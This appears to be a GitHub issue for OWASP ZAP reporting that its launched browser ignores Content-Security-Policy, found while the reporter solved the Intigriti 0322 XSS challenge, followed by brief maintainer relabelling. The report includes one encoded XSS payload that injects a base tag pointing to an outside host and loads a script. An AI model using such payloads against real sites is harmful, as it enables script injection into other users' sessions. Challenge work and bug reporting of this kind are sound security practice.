You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi team.
This is an issue that I experienced while solving the intigrity XSS 0322 challenge recently.
CSP exists in Response as shown below, but CSP is not processed in Pre-configured browser.
Of course, I spent a little more time and eventually bypassed CSP. However, I was excited for a while because of the alert() of the pre-configured browser at the beginning of the test.
However, analysts who use ZAP should also be protected by CSP and normal operation of CSP is required for accurate testing. Submit because it appears to be an issue :D
Request
POST https://challenge-0322.intigriti.io/challenge/LoveReceiver.php HTTP/1.1
token=b037132edc1c393820596e2bfd647b05823ed1c779950cd4eb2263fa0a32ebfe&FirstText=%3Cbase+href%3D%27https%3A%2F%2Fpocs.hahwul.com%2F%27%3E%3Cscript+src%3D%27%2Falert.js%27%3E%3C%2Fscript%3E&Hashing=aaa
A script is inserted into the Response and is protected by the CSP. Of course, the core of this challenge was CSP, but in the ZAP Pre-configured browser, the CSP is ignored and the script works.
Expected behavior
XSS code is not work (because, protected from CSP)
I've added both the "add-on" and "Component-Docs" labels until we decide how we want to address this. Also I've removed "bug" and added "enhancement" as (as far as I know) this is intentional, so adding and option etc would be an enhancement.
Hi @kingthorin
Thank you so very very much!
I don't know if I can be of any help, but I'll try my best to test it(If you need my help). I'm rooting for you!
kingthorin
changed the title
CSP does not seem to work normally in pre-configured browser.
CSP does not seem to work normally in launched browser
Apr 7, 2022
Describe the bug
Hi team.
This is an issue that I experienced while solving the intigrity XSS 0322 challenge recently.
CSP exists in Response as shown below, but CSP is not processed in Pre-configured browser.
Of course, I spent a little more time and eventually bypassed CSP. However, I was excited for a while because of the alert() of the pre-configured browser at the beginning of the test.
However, analysts who use ZAP should also be protected by CSP and normal operation of CSP is required for accurate testing. Submit because it appears to be an issue :D
Request
Response header
I checked the options and scripts just in case the CSP Disable option was turned on, but there was nothing like that.
Steps to reproduce the behavior
Expected behavior
XSS code is not work (because, protected from CSP)
Software versions
Screenshots
No response
Errors from the zap.log file
No response
Additional context
No response
Would you like to help fix this issue?
The text was updated successfully, but these errors were encountered: